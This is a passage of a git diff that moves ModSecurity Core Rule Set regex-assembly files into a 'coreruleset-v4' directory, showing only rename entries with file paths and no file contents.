b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932140.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932140.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932140.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932175.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932175.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932175.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932175.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932200.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932200.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932200.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932200.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932205.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932205.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932205.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932205.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932206.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932206.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932206.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932206.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932210.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932210.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932210.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932220.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932220.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932220.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932220.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932230.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932230.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932230.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932230.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932231.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932231.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932231.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932231.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932232.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932232.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932232.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932232.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932235.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932235.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932235.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932235.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932236.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932236.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932236.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932236.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932237.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932237.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932237.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932237.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932238.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932238.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932238.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932238.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932239.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932239.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932239.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932239.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932240.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932240.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932240.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932240.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932250.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932250.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932250.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932250.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932260.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932260.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932260.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932260.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932300.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932300.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932300.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932300.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932301.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932301.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932301.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932301.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932310.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932310.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932310.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932310.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932311.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932311.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932311.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932311.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932320.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932320.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932320.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932320.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932321.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932321.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932321.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932321.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932370.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932370.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932370.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932370.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/932380.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932380.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/932380.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/932380.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933131.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933131.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933131.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933160.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933160.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933160.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933160.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933161.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933161.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933161.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933161.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933200.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933200.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933200.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933200.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933210.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933210.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933210.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/933211.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933211.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/933211.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/933211.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934100.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934100.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934100.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934100.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934101.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934101.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934101.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934101.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934120.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934120.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934120.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934120.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934140.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934140.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934140.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934140.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934150.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934150.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934150.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934150.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934160.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934160.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934160.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934160.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934170.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934170.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934170.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934170.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941130.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941130.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941130.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941160.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941160.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941160.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941160.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941210.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941210.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941210.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941220.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941220.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941220.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941220.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941390.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941390.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941390.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941390.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942120.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942120.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942120.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942120.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942130.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942130.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942130.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942131.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942131.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942131.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942140.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942140.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942140.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942140.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942150.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942150.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942150.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942150.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942151.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942151.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942151.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942151.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942152.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942152.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942152.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942152.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942170.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942170.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942170.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942170.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942180.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942180.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942180.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942180.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942190.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942190.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942190.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942190.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942200.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942200.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942200.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942200.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942210.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942210.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942210.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942230.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942230.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942230.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942230.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942240.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942240.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942240.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942240.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942260.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942260.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942260.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942260.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942280.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942280.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942280.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942280.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942290.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942290.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942290.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942290.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942300.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942300.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942300.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942300.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942310.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942310.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942310.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942310.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942320.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942320.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942320.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942320.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942321.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942321.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942321.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942321.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942330.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942330.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942330.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942330.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942340.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942340.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942340.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942340.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942350.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942350.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942350.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942350.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942360.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942360.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942360.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942360.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942362.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942362.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942362.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942362.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942370.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942370.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942370.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942370.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942380.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942380.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942380.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942380.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942390.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942390.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942390.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942390.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942400.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942400.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942400.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942400.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942410.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942410.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942410.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942410.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942440-chain1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440-chain1.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942440-chain1.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440-chain1.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942440.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942440.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942470.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942470.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942470.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942470.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942480.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942480.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942480.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942480.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942500.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942500.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942500.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942500.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942520.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942520.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942520.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942520.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942521.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942521.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942521.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942521.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942540.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942540.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942540.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942540.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942550.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942550.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942550.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942550.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942560.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942560.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942560.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942560.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/944150.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944150.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/944150.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944150.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/944151.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944151.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/944151.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944151.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/944152.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944152.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/944152.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944152.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/951230.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951230.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/951230.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951230.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/951240.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951240.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/951240.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951240.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-useragents.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-useragents.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-useragents.ra rename to 